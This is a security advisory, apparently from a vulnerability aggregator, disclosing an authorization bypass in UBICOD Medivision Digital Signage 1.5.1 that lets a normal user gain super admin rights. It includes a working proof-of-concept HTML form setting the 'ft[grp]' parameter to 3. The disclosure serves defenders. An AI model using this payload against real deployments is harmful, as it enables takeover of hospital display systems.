Lucene search

K
zeroscienceGjoko KrsticZSL-2020-5575
HistoryJul 19, 2020 - 12:00 a.m.

UBICOD Medivision Digital Signage 1.5.1 Privilege Escalation Through Authorization Bypass

2020-07-1900:00:00
Gjoko Krstic
zeroscience.mk
52
ubicod medivision digital signage
privilege escalation
authorization bypass
vulnerability
vendor status
zero science lab

AI Score

7.7

Confidence

High

Title: UBICOD Medivision Digital Signage 1.5.1 Privilege Escalation Through Authorization Bypass
Advisory ID: ZSL-2020-5575
Type: Local/Remote
Impact: Privilege Escalation
Risk: (4/5)
Release Date: 19.07.2020

Summary

Medivision is a service that provides everything from DID operation to development of DID (Digital Information Display) optimized for hospital environment and production of professional contents, through DID product installation, image, video content planning, design work, and remote control. This is a one-stop solution that solves management at once.

Description

The application suffers from a privilege escalation vulnerability. Normal user can elevate his/her privileges by navigating to /html/user (via IDOR) page sending an HTTP GET request setting the parameter ‘ft[grp]’ to integer value ‘3’ gaining super admin rights.

Vendor

UBICOD Co., Ltd. | MEDIVISION INC. - http://www.medivision.co.kr

Affected Version

Firmware 1.5.1 (2013.01.3)

Tested On

Apache/2.4.7 (Ubuntu)
PHP/5.5.9-1ubuntu4.22

Vendor Status

[19.06.2020] Vulnerability discovered.
[21.06.2020] Vendor contacted.
[18.07.2020] No response from the vendor.
[19.07.2020] Public security advisory released.

PoC

ubicod_privesc.txt

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] https://packetstormsecurity.com/files/158479/UBICOD-Medivision-Digital-Signage-1.5.1-Privilege-Escalation.html
[2] https://exchange.xforce.ibmcloud.com/vulnerabilities/185537
[3] https://www.exploit-db.com/exploits/48684

Changelog

[19.07.2020] - Initial release
[24.07.2020] - Added reference [1], [2] and [3]

Contact

Zero Science Lab

Web: https://www.zeroscience.mk
e-mail: [email protected]

<html><body><p>UBICOD Medivision Digital Signage 1.5.1 Privilege Escalation Through Authorization Bypass


Vendor: UBICOD Co., Ltd. | MEDIVISION INC.
Product web page: http://www.medivision.co.kr
Affected version: Firmware 1.5.1 (2013.01.3)

Summary: Medivision is a service that provides everything from DID operation to
development of DID (Digital Information Display) optimized for hospital environment
and production of professional contents, through DID product installation, image,
video content planning, design work, and remote control. This is a one-stop solution
that solves management at once.

Desc: The application suffers from a privilege escalation vulnerability. Normal user
can elevate his/her privileges by navigating to /html/user (via IDOR) page sending an
HTTP GET request setting the parameter 'ft[grp]' to integer value '3' gaining super
admin rights.

Tested on: Apache/2.4.7 (Ubuntu)
           PHP/5.5.9-1ubuntu4.22


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2020-5575
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5575.php


19.06.2020

--



  </p>
<form action="http://10.0.39.2/query/user/itSet" method="POST">
<input name="aa[_id]" type="hidden" value="157"/>
<input name="aa[pass]" type="hidden" value="123456"/>
<input name="od[]" type="hidden" value="name"/>
<input name="ft[grp]" type="hidden" value="3"/>
<input name="ip" type="hidden" value="0"/>
<input name="np" type="hidden" value="13"/>
<input type="submit" value="Submit request"/>
</form>
</body></html>

AI Score

7.7

Confidence

High